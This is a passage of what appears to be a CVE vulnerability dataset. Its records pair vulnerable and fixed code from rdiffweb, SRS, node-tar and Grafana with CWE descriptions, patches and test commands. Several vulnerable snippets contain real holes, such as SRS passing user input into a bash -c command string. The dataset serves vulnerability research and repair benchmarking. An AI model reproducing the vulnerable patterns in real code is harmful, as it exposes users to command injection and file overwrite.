'bar');\n+ await user.save();\n+ user.set('yolo', 'bar');\n+ await user.save();\n+ await user.destroy();\n+ await new Promise(resolve => process.nextTick(resolve));\n+ for (const key of events) {\n+ expect(calls[key]).toHaveBeenCalled();\n+ }\n+ });\n\n--- /dev/null\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -0,0 +1,44 @@\n+ it('should strip out authdata in LiveQuery', async () => {\n+ const provider = getMockFacebookProvider();\n+ Parse.User._registerAuthenticationProvider(provider);\n+\n+ await reconfigureServer({\n+ liveQuery: { classNames: ['_User'] },\n+ startLiveQueryServer: true,\n+ verbose: false,\n+ silent: true,\n+ });\n+\n+ const query = new Parse.Query(Parse.User);\n+ query.doesNotExist('foo');\n+ const subscription = await query.subscribe();\n+\n+ const events = ['create', 'update', 'enter', 'leave', 'delete'];\n+ const response = (obj, prev) => {\n+ expect(obj.get('authData')).toBeUndefined();\n+ expect(obj.authData).toBeUndefined();\n+ expect(prev?.authData).toBeUndefined();\n+ if (prev && prev.get) {\n+ expect(prev.get('authData')).toBeUndefined();\n+ }\n+ };\n+ const calls = {};\n+ for (const key of events) {\n+ calls[key] = response;\n+ spyOn(calls, key).and.callThrough();\n+ subscription.on(key, calls[key]);\n+ }\n+ const user = await Parse.User._logInWith('facebook');\n+\n+ user.set('foo', 'bar');\n+ await user.save();\n+ user.unset('foo');\n+ await user.save();\n+ user.set('yolo', 'bar');\n+ await user.save();\n+ await user.destroy();\n+ await new Promise(resolve => process.nextTick(resolve));\n+ for (const key of events) {\n+ expect(calls[key]).toHaveBeenCalled();\n+ }\n+ });\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-4314", "cve_description": "Improper Privilege Management in GitHub repository ikus060/rdiffweb prior to 2.5.2.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/b2df3679564d0daa2856213bb307d3e34bd89a25"], "programing_language": "Python", "vul_func": [{"id": "vul_py_334_1", "commit": "979ab34", "file_path": "rdiffweb/core/librdiff.py", "start_line": 848, "end_line": 872, "snippet": " def __init__(self, user_root, path, encoding):\n if isinstance(user_root, str):\n user_root = os.fsencode(user_root)\n if isinstance(path, str):\n path = os.fsencode(path)\n assert isinstance(user_root, bytes)\n assert isinstance(path, bytes)\n assert encoding\n self._encoding = encodings.search_function(encoding)\n assert self._encoding\n self.path = path.strip(b\"/\")\n if self.path:\n self.full_path = os.path.normpath(os.path.join(user_root, self.path))\n else:\n self.full_path = os.path.normpath(user_root)\n\n # The location of rdiff-backup-data directory.\n self._data_path = os.path.join(self.full_path, RDIFF_BACKUP_DATA)\n assert isinstance(self._data_path, bytes)\n self._increment_path = os.path.join(self._data_path, INCREMENTS)\n self.current_mirror = MetadataDict(self, CurrentMirrorEntry)\n self.error_log = MetadataDict(self, LogEntry)\n self.mirror_metadata = MetadataDict(self, MirrorMetadataEntry)\n self.file_statistics = MetadataDict(self, FileStatisticsEntry)\n self.session_statistics = MetadataDict(self, SessionStatisticsEntry)"}, {"id": "vul_py_334_2", "commit": "979ab34", "file_path": "rdiffweb/core/librdiff.py", "start_line": 1083, "end_line": 1096, "snippet": " def get_display_name(self, path):\n \"\"\"\n Return proper display name of the given path according to repository encoding and quoted characters.\n \"\"\"\n assert isinstance(path, bytes)\n path = path.strip(b'/')\n if path in [b'.', b'']:\n # For repository we use either path if defined or the directory base name\n if not self.path:\n return self._decode(unquote(os.path.basename(self.full_path)))\n return self._decode(unquote(self.path))\n else:\n # For path, we use the dir name\n return self._decode(unquote(os.path.basename(path)))"}, {"id": "vul_py_334_3", "commit": "979ab34", "file_path": "rdiffweb/core/model/_repo.py", "start_line": 135, "end_line": 143, "snippet": " def __init_on_load__(self):\n RdiffRepo.__init__(\n self, self.user.user_root, self.repopath, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING\n )\n\n @property\n def displayname(self):\n # Repository displayName is the \"repopath\" too.\n return self.repopath.strip('/')"}, {"id": "vul_py_334_4", "commit": "979ab34", "file_path": "rdiffweb/core/rdw_templating.py", "start_line": 159, "end_line": 191, "snippet": "def url_for(*args, **kwargs):\n \"\"\"\n Generate a url for the given endpoint, path (*args) with parameters (**kwargs)\n\n This could be used to generate a path with userobject and repo object\n\n \"\"\"\n path = \"\"\n for chunk in args:\n if not chunk:\n continue\n if hasattr(chunk, 'owner') and hasattr(chunk, 'path'):\n # This is a RepoObject\n path += \"/\"\n path += chunk.owner\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n elif hasattr(chunk, 'path'):\n # This is a DirEntry\n if chunk.path:\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n elif chunk and isinstance(chunk, bytes):\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.strip(b\"/\"))\n elif chunk and isinstance(chunk, str):\n path += \"/\"\n path += chunk.strip(\"/\")\n else:\n raise ValueError('invalid positional arguments, url_for accept str, bytes or RepoPath: %r' % chunk)\n # Sort the arguments to have predictable results.\n qs = [(k, v.epoch() if hasattr(v, 'epoch') else v) for k, v in sorted(kwargs.items()) if v is not None]\n return cherrypy.url(path=path, qs=qs)"}], "fix_func": [{"id": "fix_py_334_1", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/librdiff.py", "start_line": 848, "end_line": 867, "snippet": " def __init__(self, full_path, encoding):\n assert encoding, 'encoding is required'\n self._encoding = encodings.search_function(encoding)\n assert self._encoding, 'encoding must be a valid charset'\n\n # Validate and sanitize the full_path\n assert full_path, 'full path is required'\n self.full_path = os.fsencode(full_path) if isinstance(full_path, str) else full_path\n assert os.path.isabs(self.full_path), 'full_path must be absolute path'\n self.full_path = os.path.normpath(self.full_path)\n\n # The location of rdiff-backup-data directory.\n self._data_path = os.path.join(self.full_path, RDIFF_BACKUP_DATA)\n assert isinstance(self._data_path, bytes)\n self._increment_path = os.path.join(self._data_path, INCREMENTS)\n self.current_mirror = MetadataDict(self, CurrentMirrorEntry)\n self.error_log = MetadataDict(self, LogEntry)\n self.mirror_metadata = MetadataDict(self, MirrorMetadataEntry)\n self.file_statistics = MetadataDict(self, FileStatisticsEntry)\n self.session_statistics = MetadataDict(self, SessionStatisticsEntry)"}, {"id": "fix_py_334_2", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/librdiff.py", "start_line": 1078, "end_line": 1089, "snippet": " def get_display_name(self, path):\n \"\"\"\n Return proper display name of the given path according to repository encoding and quoted characters.\n \"\"\"\n assert isinstance(path, bytes)\n path = path.strip(b'/')\n if path in [b'.', b'']:\n # For repository the directory base name\n return self._decode(unquote(os.path.basename(self.full_path)))\n else:\n # For path, we use the dir name\n return self._decode(unquote(os.path.basename(path)))"}, {"id": "fix_py_334_3", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/model/_repo.py", "start_line": 135, "end_line": 143, "snippet": " def __init_on_load__(self):\n # RdiffRepo required an absolute full path, When the user_root is invalid, let generate an invalid full path.\n if not self.user.user_root:\n full_path = os.path.join('/user_has_an_empty_user_root/', self.repopath.strip('/'))\n elif not os.path.isabs(self.user.user_root):\n full_path = os.path.join('/user_has_a_relative_user_root/', self.repopath.strip('/'))\n else:\n full_path = os.path.join(self.user.user_root, self.repopath.strip('/'))\n RdiffRepo.__init__(self, full_path, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING)"}, {"id": "fix_py_334_4", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/rdw_templating.py", "start_line": 159, "end_line": 191, "snippet": "def url_for(*args, **kwargs):\n \"\"\"\n Generate a url for the given endpoint, path (*args) with parameters (**kwargs)\n\n This could be used to generate a path with userobject and repo object\n\n \"\"\"\n path = \"\"\n for chunk in args:\n if not chunk:\n continue\n if hasattr(chunk, 'owner') and hasattr(chunk, 'repopath'):\n # This is a RepoObject\n path += \"/\"\n path += chunk.owner\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.repopath.strip(\"/\"))\n elif hasattr(chunk, 'path'):\n # This is a DirEntry\n if chunk.path:\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n elif chunk and isinstance(chunk, bytes):\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.strip(b\"/\"))\n elif chunk and isinstance(chunk, str):\n path += \"/\"\n path += chunk.strip(\"/\")\n else:\n raise ValueError('invalid positional arguments, url_for accept str, bytes or RepoPath: %r' % chunk)\n # Sort the arguments to have predictable results.\n qs = [(k, v.epoch() if hasattr(v, 'epoch') else v) for k, v in sorted(kwargs.items()) if v is not None]\n return cherrypy.url(path=path, qs=qs)"}], "vul_patch": "--- a/rdiffweb/core/librdiff.py\n+++ b/rdiffweb/core/librdiff.py\n@@ -1,18 +1,13 @@\n- def __init__(self, user_root, path, encoding):\n- if isinstance(user_root, str):\n- user_root = os.fsencode(user_root)\n- if isinstance(path, str):\n- path = os.fsencode(path)\n- assert isinstance(user_root, bytes)\n- assert isinstance(path, bytes)\n- assert encoding\n+ def __init__(self, full_path, encoding):\n+ assert encoding, 'encoding is required'\n self._encoding = encodings.search_function(encoding)\n- assert self._encoding\n- self.path = path.strip(b\"/\")\n- if self.path:\n- self.full_path = os.path.normpath(os.path.join(user_root, self.path))\n- else:\n- self.full_path = os.path.normpath(user_root)\n+ assert self._encoding, 'encoding must be a valid charset'\n+\n+ # Validate and sanitize the full_path\n+ assert full_path, 'full path is required'\n+ self.full_path = os.fsencode(full_path) if isinstance(full_path, str) else full_path\n+ assert os.path.isabs(self.full_path), 'full_path must be absolute path'\n+ self.full_path = os.path.normpath(self.full_path)\n \n # The location of rdiff-backup-data directory.\n self._data_path = os.path.join(self.full_path, RDIFF_BACKUP_DATA)\n\n--- a/rdiffweb/core/librdiff.py\n+++ b/rdiffweb/core/librdiff.py\n@@ -5,10 +5,8 @@\n assert isinstance(path, bytes)\n path = path.strip(b'/')\n if path in [b'.', b'']:\n- # For repository we use either path if defined or the directory base name\n- if not self.path:\n- return self._decode(unquote(os.path.basename(self.full_path)))\n- return self._decode(unquote(self.path))\n+ # For repository the directory base name\n+ return self._decode(unquote(os.path.basename(self.full_path)))\n else:\n # For path, we use the dir name\n return self._decode(unquote(os.path.basename(path)))\n\n--- a/rdiffweb/core/model/_repo.py\n+++ b/rdiffweb/core/model/_repo.py\n@@ -1,9 +1,9 @@\n def __init_on_load__(self):\n- RdiffRepo.__init__(\n- self, self.user.user_root, self.repopath, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING\n- )\n-\n- @property\n- def displayname(self):\n- # Repository displayName is the \"repopath\" too.\n- return self.repopath.strip('/')\n+ # RdiffRepo required an absolute full path, When the user_root is invalid, let generate an invalid full path.\n+ if not self.user.user_root:\n+ full_path = os.path.join('/user_has_an_empty_user_root/', self.repopath.strip('/'))\n+ elif not os.path.isabs(self.user.user_root):\n+ full_path = os.path.join('/user_has_a_relative_user_root/', self.repopath.strip('/'))\n+ else:\n+ full_path = os.path.join(self.user.user_root, self.repopath.strip('/'))\n+ RdiffRepo.__init__(self, full_path, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING)\n\n--- a/rdiffweb/core/rdw_templating.py\n+++ b/rdiffweb/core/rdw_templating.py\n@@ -9,12 +9,12 @@\n for chunk in args:\n if not chunk:\n continue\n- if hasattr(chunk, 'owner') and hasattr(chunk, 'path'):\n+ if hasattr(chunk, 'owner') and hasattr(chunk, 'repopath'):\n # This is a RepoObject\n path += \"/\"\n path += chunk.owner\n path += \"/\"\n- path += rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n+ path += rdw_helpers.quote_url(chunk.repopath.strip(\"/\"))\n elif hasattr(chunk, 'path'):\n # This is a DirEntry\n if chunk.path:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-34105", "cve_description": "SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's `api-server` server is vulnerable to a drive-by command injection. An attacker may send a request to the `/api/v1/snapshots` endpoint containing any commands to be executed as part of the body of the POST request. This issue may lead to Remote Code Execution (RCE). Versions 5.0.157, 5.0-b1, and 6.0.48 contain a fix.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/ossrs/srs", "patch_url": ["https://github.com/ossrs/srs/commit/1d878c2daaf913ad01c6d0bc2f247116c8050338"], "programing_language": "Go", "vul_func": [{"id": "vul_go_261_1", "commit": "df854339ea19847e80f442e11f7506d1b7883152", "file_path": "trunk/research/api-server/server.go", "start_line": 393, "end_line": 430, "snippet": "func (v *SnapshotJob) do(ffmpegPath, inputUrl string) (err error) {\n\toutputPicDir := path.Join(StaticDir, v.App)\n\tif err = os.MkdirAll(outputPicDir, 0777); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"create snapshot image dir:%v failed, err is %v\", outputPicDir, err))\n\t\treturn\n\t}\n\n\tnormalPicPath := path.Join(outputPicDir, fmt.Sprintf(\"%v\", v.Stream)+\"-%03d.png\")\n\tbestPng := path.Join(outputPicDir, fmt.Sprintf(\"%v-best.png\", v.Stream))\n\n\tparam := fmt.Sprintf(\"%v -i %v -vf fps=1 -vcodec png -f image2 -an -y -vframes %v -y %v\", ffmpegPath, inputUrl, v.vframes, normalPicPath)\n\tlog.Println(fmt.Sprintf(\"start snapshot, cmd param=%v\", param))\n\ttimeoutCtx, _ := context.WithTimeout(v.cancelCtx, v.timeout)\n\tcmd := exec.CommandContext(timeoutCtx, \"/bin/bash\", \"-c\", param)\n\tif err = cmd.Run(); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"run snapshot %v cmd failed, err is %v\", v.Tag(), err))\n\t\treturn\n\t}\n\n\tbestFileSize := int64(0)\n\tfor i := 1; i <= v.vframes; i++ {\n\t\tpic := path.Join(outputPicDir, fmt.Sprintf(\"%v-%03d.png\", v.Stream, i))\n\t\tfi, err := os.Stat(pic)\n\t\tif err != nil {\n\t\t\tlog.Println(fmt.Sprintf(\"stat pic:%v failed, err is %v\", pic, err))\n\t\t\tcontinue\n\t\t}\n\t\tif bestFileSize == 0 {\n\t\t\tbestFileSize = fi.Size()\n\t\t} else if fi.Size() > bestFileSize {\n\t\t\tos.Remove(bestPng)\n\t\t\tos.Symlink(pic, bestPng)\n\t\t\tbestFileSize = fi.Size()\n\t\t}\n\t}\n\tlog.Println(fmt.Sprintf(\"%v the best thumbnail is %v\", v.Tag(), bestPng))\n\treturn\n}"}], "fix_func": [{"id": "fix_go_261_1", "commit": "1d878c2daaf913ad01c6d0bc2f247116c8050338", "file_path": "trunk/research/api-server/server.go", "start_line": 393, "end_line": 438, "snippet": "func (v *SnapshotJob) do(ffmpegPath, inputUrl string) (err error) {\n\toutputPicDir := path.Join(StaticDir, v.App)\n\tif err = os.MkdirAll(outputPicDir, 0777); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"create snapshot image dir:%v failed, err is %v\", outputPicDir, err))\n\t\treturn\n\t}\n\n\tnormalPicPath := path.Join(outputPicDir, fmt.Sprintf(\"%v\", v.Stream)+\"-%03d.png\")\n\tbestPng := path.Join(outputPicDir, fmt.Sprintf(\"%v-best.png\", v.Stream))\n\n\tparams := []string{\n\t\t\"-i\", inputUrl,\n\t\t\"-vf\", \"fps=1\",\n\t\t\"-vcodec\", \"png\",\n\t\t\"-f\", \"image2\",\n\t\t\"-an\",\n\t\t\"-vframes\", strconv.Itoa(v.vframes),\n\t\t\"-y\", normalPicPath,\n\t}\n\tlog.Println(fmt.Sprintf(\"start snapshot, cmd param=%v %v\", ffmpegPath, strings.Join(params, \" \")))\n\ttimeoutCtx, _ := context.WithTimeout(v.cancelCtx, v.timeout)\n\tcmd := exec.CommandContext(timeoutCtx, ffmpegPath, params...)\n\tif err = cmd.Run(); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"run snapshot %v cmd failed, err is %v\", v.Tag(), err))\n\t\treturn\n\t}\n\n\tbestFileSize := int64(0)\n\tfor i := 1; i <= v.vframes; i++ {\n\t\tpic := path.Join(outputPicDir, fmt.Sprintf(\"%v-%03d.png\", v.Stream, i))\n\t\tfi, err := os.Stat(pic)\n\t\tif err != nil {\n\t\t\tlog.Println(fmt.Sprintf(\"stat pic:%v failed, err is %v\", pic, err))\n\t\t\tcontinue\n\t\t}\n\t\tif bestFileSize == 0 {\n\t\t\tbestFileSize = fi.Size()\n\t\t} else if fi.Size() > bestFileSize {\n\t\t\tos.Remove(bestPng)\n\t\t\tos.Symlink(pic, bestPng)\n\t\t\tbestFileSize = fi.Size()\n\t\t}\n\t}\n\tlog.Println(fmt.Sprintf(\"%v the best thumbnail is %v\", v.Tag(), bestPng))\n\treturn\n}"}], "vul_patch": "--- a/trunk/research/api-server/server.go\n+++ b/trunk/research/api-server/server.go\n@@ -8,10 +8,18 @@\n \tnormalPicPath := path.Join(outputPicDir, fmt.Sprintf(\"%v\", v.Stream)+\"-%03d.png\")\n \tbestPng := path.Join(outputPicDir, fmt.Sprintf(\"%v-best.png\", v.Stream))\n \n-\tparam := fmt.Sprintf(\"%v -i %v -vf fps=1 -vcodec png -f image2 -an -y -vframes %v -y %v\", ffmpegPath, inputUrl, v.vframes, normalPicPath)\n-\tlog.Println(fmt.Sprintf(\"start snapshot, cmd param=%v\", param))\n+\tparams := []string{\n+\t\t\"-i\", inputUrl,\n+\t\t\"-vf\", \"fps=1\",\n+\t\t\"-vcodec\", \"png\",\n+\t\t\"-f\", \"image2\",\n+\t\t\"-an\",\n+\t\t\"-vframes\", strconv.Itoa(v.vframes),\n+\t\t\"-y\", normalPicPath,\n+\t}\n+\tlog.Println(fmt.Sprintf(\"start snapshot, cmd param=%v %v\", ffmpegPath, strings.Join(params, \" \")))\n \ttimeoutCtx, _ := context.WithTimeout(v.cancelCtx, v.timeout)\n-\tcmd := exec.CommandContext(timeoutCtx, \"/bin/bash\", \"-c\", param)\n+\tcmd := exec.CommandContext(timeoutCtx, ffmpegPath, params...)\n \tif err = cmd.Run(); err != nil {\n \t\tlog.Println(fmt.Sprintf(\"run snapshot %v cmd failed, err is %v\", v.Tag(), err))\n \t\treturn\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32803", "cve_description": "The npm package \"tar\" (aka node-tar) before versions 6.1.2, 5.0.7, 4.4.15, and 3.2.3 has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/npm/node-tar", "patch_url": ["https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_47_1", "commit": "df3aa4d", "file_path": "lib/unpack.js", "start_line": 415, "end_line": 437, "snippet": " [CHECKFS] (entry) {\n this[PEND]()\n this[MKDIR](path.dirname(entry.absolute), this.dmode, er => {\n if (er)\n return this[ONERROR](er, entry)\n fs.lstat(entry.absolute, (er, st) => {\n if (st && (this.keep || this.newer && st.mtime > entry.mtime))\n this[SKIP](entry)\n else if (er || this[ISREUSABLE](entry, st))\n this[MAKEFS](null, entry)\n else if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (!entry.mode || (st.mode & 0o7777) === entry.mode)\n this[MAKEFS](null, entry)\n else\n fs.chmod(entry.absolute, entry.mode, er => this[MAKEFS](er, entry))\n } else\n fs.rmdir(entry.absolute, er => this[MAKEFS](er, entry))\n } else\n unlinkFile(entry.absolute, er => this[MAKEFS](er, entry))\n })\n })\n }"}, {"id": "vul_js_47_2", "commit": "df3aa4d", "file_path": "lib/unpack.js", "start_line": 477, "end_line": 505, "snippet": " [CHECKFS] (entry) {\n const er = this[MKDIR](path.dirname(entry.absolute), this.dmode)\n if (er)\n return this[ONERROR](er, entry)\n try {\n const st = fs.lstatSync(entry.absolute)\n if (this.keep || this.newer && st.mtime > entry.mtime)\n return this[SKIP](entry)\n else if (this[ISREUSABLE](entry, st))\n return this[MAKEFS](null, entry)\n else {\n try {\n if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (entry.mode && (st.mode & 0o7777) !== entry.mode)\n fs.chmodSync(entry.absolute, entry.mode)\n } else\n fs.rmdirSync(entry.absolute)\n } else\n unlinkFileSync(entry.absolute)\n return this[MAKEFS](null, entry)\n } catch (er) {\n return this[ONERROR](er, entry)\n }\n }\n } catch (er) {\n return this[MAKEFS](null, entry)\n }\n }"}], "fix_func": [{"id": "fix_js_47_1", "commit": "46fe350", "file_path": "lib/unpack.js", "start_line": 415, "end_line": 451, "snippet": " [CHECKFS] (entry) {\n this[PEND]()\n\n // if we are not creating a directory, and the path is in the dirCache,\n // then that means we are about to delete the directory we created\n // previously, and it is no longer going to be a directory, and neither\n // is any of its children.\n if (entry.type !== 'Directory') {\n for (const path of this.dirCache.keys()) {\n if (path === entry.absolute ||\n path.indexOf(entry.absolute + '/') === 0 ||\n path.indexOf(entry.absolute + '\\\\') === 0)\n this.dirCache.delete(path)\n }\n }\n\n this[MKDIR](path.dirname(entry.absolute), this.dmode, er => {\n if (er)\n return this[ONERROR](er, entry)\n fs.lstat(entry.absolute, (er, st) => {\n if (st && (this.keep || this.newer && st.mtime > entry.mtime))\n this[SKIP](entry)\n else if (er || this[ISREUSABLE](entry, st))\n this[MAKEFS](null, entry)\n else if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (!entry.mode || (st.mode & 0o7777) === entry.mode)\n this[MAKEFS](null, entry)\n else\n fs.chmod(entry.absolute, entry.mode, er => this[MAKEFS](er, entry))\n } else\n fs.rmdir(entry.absolute, er => this[MAKEFS](er, entry))\n } else\n unlinkFile(entry.absolute, er => this[MAKEFS](er, entry))\n })\n })\n }"}, {"id": "fix_js_47_2", "commit": "46fe350", "file_path": "lib/unpack.js", "start_line": 491, "end_line": 528, "snippet": " [CHECKFS] (entry) {\n if (entry.type !== 'Directory') {\n for (const path of this.dirCache.keys()) {\n if (path === entry.absolute ||\n path.indexOf(entry.absolute + '/') === 0 ||\n path.indexOf(entry.absolute + '\\\\') === 0)\n this.dirCache.delete(path)\n }\n }\n\n const er = this[MKDIR](path.dirname(entry.absolute), this.dmode)\n if (er)\n return this[ONERROR](er, entry)\n try {\n const st = fs.lstatSync(entry.absolute)\n if (this.keep || this.newer && st.mtime > entry.mtime)\n return this[SKIP](entry)\n else if (this[ISREUSABLE](entry, st))\n return this[MAKEFS](null, entry)\n else {\n try {\n if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (entry.mode && (st.mode & 0o7777) !== entry.mode)\n fs.chmodSync(entry.absolute, entry.mode)\n } else\n fs.rmdirSync(entry.absolute)\n } else\n unlinkFileSync(entry.absolute)\n return this[MAKEFS](null, entry)\n } catch (er) {\n return this[ONERROR](er, entry)\n }\n }\n } catch (er) {\n return this[MAKEFS](null, entry)\n }\n }"}], "vul_patch": "--- a/lib/unpack.js\n+++ b/lib/unpack.js\n@@ -1,5 +1,19 @@\n [CHECKFS] (entry) {\n this[PEND]()\n+\n+ // if we are not creating a directory, and the path is in the dirCache,\n+ // then that means we are about to delete the directory we created\n+ // previously, and it is no longer going to be a directory, and neither\n+ // is any of its children.\n+ if (entry.type !== 'Directory') {\n+ for (const path of this.dirCache.keys()) {\n+ if (path === entry.absolute ||\n+ path.indexOf(entry.absolute + '/') === 0 ||\n+ path.indexOf(entry.absolute + '\\\\') === 0)\n+ this.dirCache.delete(path)\n+ }\n+ }\n+\n this[MKDIR](path.dirname(entry.absolute), this.dmode, er => {\n if (er)\n return this[ONERROR](er, entry)\n\n--- a/lib/unpack.js\n+++ b/lib/unpack.js\n@@ -1,4 +1,13 @@\n [CHECKFS] (entry) {\n+ if (entry.type !== 'Directory') {\n+ for (const path of this.dirCache.keys()) {\n+ if (path === entry.absolute ||\n+ path.indexOf(entry.absolute + '/') === 0 ||\n+ path.indexOf(entry.absolute + '\\\\') === 0)\n+ this.dirCache.delete(path)\n+ }\n+ }\n+\n const er = this[MKDIR](path.dirname(entry.absolute), this.dmode)\n if (er)\n return this[ONERROR](er, entry)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-32803:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode ./test/unpack.js\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-32803:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/fix.patch\nnode ./test/unpack.js\n"} {"cve_id": "CVE-2021-39226", "cve_description": "Grafana is an open source data visualization platform. In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot \"public_mode\" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: /api/snapshots-delete/:deleteKey. Regardless of the snapshot \"public_mode\" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: /api/snapshots/:key, or /api/snapshots-delete/:deleteKey. The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. This issue has been resolved in versions 8.1.6 and 7.5.11. If for some reason you cannot upgrade you can use a reverse proxy or similar to block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/grafana/grafana", "patch_url": ["https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269"], "programing_language": "Go", "vul_func": [{"id": "vul_go_138_1", "commit": "c725a42", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 147, "end_line": 181, "snippet": "func GetDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tsnapshot := query.Result\n\n\t// expired snapshots should also be removed from db\n\tif snapshot.Expires.Before(time.Now()) {\n\t\treturn response.Error(404, \"Dashboard snapshot not found\", err)\n\t}\n\n\tdashboard, err := snapshot.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\n\tdto := dtos.DashboardFullWithMeta{\n\t\tDashboard: dashboard,\n\t\tMeta: dtos.DashboardMeta{\n\t\t\tType: models.DashTypeSnapshot,\n\t\t\tIsSnapshot: true,\n\t\t\tCreated: snapshot.Created,\n\t\t\tExpires: snapshot.Expires,\n\t\t},\n\t}\n\n\tmetrics.MApiDashboardSnapshotGet.Inc()\n\n\treturn response.JSON(200, dto).SetHeader(\"Cache-Control\", \"public, max-age=3600\")\n}"}, {"id": "vul_go_138_2", "commit": "c725a42", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 216, "end_line": 243, "snippet": "func DeleteDashboardSnapshotByDeleteKey(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":deleteKey\")\n\n\tquery := &models.GetDashboardSnapshotQuery{DeleteKey: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err != nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, 